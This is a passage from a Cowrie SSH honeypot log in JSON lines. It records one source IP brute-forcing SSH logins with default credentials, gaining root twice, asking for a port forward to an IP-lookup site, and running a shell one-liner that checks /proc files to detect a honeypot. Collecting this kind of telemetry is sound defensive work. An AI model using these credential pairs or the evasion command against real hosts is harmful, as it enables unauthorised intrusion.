ellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:21.090859Z","src_ip":"212.227.235.229","session":"6153191e9604"}
{"eventid":"cowrie.session.closed","duration":30.402684211730957,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:21.307104Z","src_ip":"212.227.125.160","session":"0f814514a96a"}
{"eventid":"cowrie.login.failed","username":"ssh","password":"ssh","message":"login attempt [ssh/ssh] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:21.416603Z","src_ip":"212.227.235.229","session":"7cee50eb0550"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt123","message":"login attempt [ubnt/ubnt123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:22.334798Z","src_ip":"212.227.235.229","session":"002a072baf7f"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:22.603370Z","src_ip":"212.227.235.229","session":"6153191e9604"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35764,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb581b280fa1","protocol":"ssh","message":"New connection: 212.227.235.229:35764 (1.2.3.4:22) [session: fb581b280fa1]","sensor":"my-vps","timestamp":"2025-08-28T08:12:23.435610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:23.437210Z","src_ip":"212.227.235.229","session":"fb581b280fa1"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:23.600350Z","src_ip":"212.227.235.229","session":"7cee50eb0550"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:23.743711Z","src_ip":"212.227.235.229","session":"fb581b280fa1"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:23.848097Z","src_ip":"212.227.235.229","session":"6153191e9604"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:24.277489Z","src_ip":"212.227.235.229","session":"002a072baf7f"}
{"eventid":"cowrie.login.success","username":"root","password":"112233","message":"login attempt [root/112233] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:12:26.240045Z","src_ip":"212.227.235.229","session":"fb581b280fa1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:12:26.505852Z","session":"fb581b280fa1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:12:26.791546Z","src_ip":"212.227.235.229","session":"fb581b280fa1"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:27.107263Z","src_ip":"212.227.235.229","session":"fb581b280fa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38658,"dst_ip":"1.2.3.4","dst_port":22,"session":"1085e5dfd271","protocol":"ssh","message":"New connection: 212.227.235.229:38658 (1.2.3.4:22) [session: 1085e5dfd271]","sensor":"my-vps","timestamp":"2025-08-28T08:12:33.130855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:33.132304Z","src_ip":"212.227.235.229","session":"1085e5dfd271"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:33.430885Z","src_ip":"212.227.235.229","session":"1085e5dfd271"}
{"eventid":"cowrie.login.failed","username":"shagrath","password":"039715582364317","message":"login attempt [shagrath/039715582364317] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:34.964314Z","src_ip":"212.227.235.229","session":"1085e5dfd271"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:36.651928Z","src_ip":"212.227.235.229","session":"1085e5dfd271"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60828,"dst_ip":"1.2.3.4","dst_port":22,"session":"99edb0c9faae","protocol":"ssh","message":"New connection: 212.227.235.229:60828 (1.2.3.4:22) [session: 99edb0c9faae]","sensor":"my-vps","timestamp":"2025-08-28T08:12:38.551554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:38.553070Z","src_ip":"212.227.235.229","session":"99edb0c9faae"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:38.811421Z","src_ip":"212.227.235.229","session":"99edb0c9faae"}
{"eventid":"cowrie.login.failed","username":"reception","password":"reception","message":"login attempt [reception/reception] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:40.687368Z","src_ip":"212.227.235.229","session":"99edb0c9faae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38856,"dst_ip":"1.2.3.4","dst_port":22,"session":"8217c265f86b","protocol":"ssh","message":"New connection: 212.227.235.229:38856 (1.2.3.4:22) [session: 8217c265f86b]","sensor":"my-vps","timestamp":"2025-08-28T08:12:41.579471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:41.858488Z","src_ip":"212.227.235.229","session":"8217c265f86b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:41.934484Z","src_ip":"212.227.235.229","session":"8217c265f86b"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:41.949747Z","src_ip":"212.227.235.229","session":"99edb0c9faae"}
{"eventid":"cowrie.login.failed","username":"opc","password":"opc","message":"login attempt [opc/opc] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:43.736914Z","src_ip":"212.227.235.229","session":"8217c265f86b"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:45.086636Z","src_ip":"212.227.235.229","session":"8217c265f86b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46328,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d5e883add01","protocol":"ssh","message":"New connection: 212.227.235.229:46328 (1.2.3.4:22) [session: 1d5e883add01]","sensor":"my-vps","timestamp":"2025-08-28T08:12:46.496911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:12:46.517688Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T08:12:46.650943Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.login.success","username":"root","password":"1234@admin","message":"login attempt [root/1234@admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.374950Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:12:47.703137Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.703873Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.704567Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.706924Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.707734Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.709304Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.710239Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.711021Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.711725Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.712669Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.713581Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.868760Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
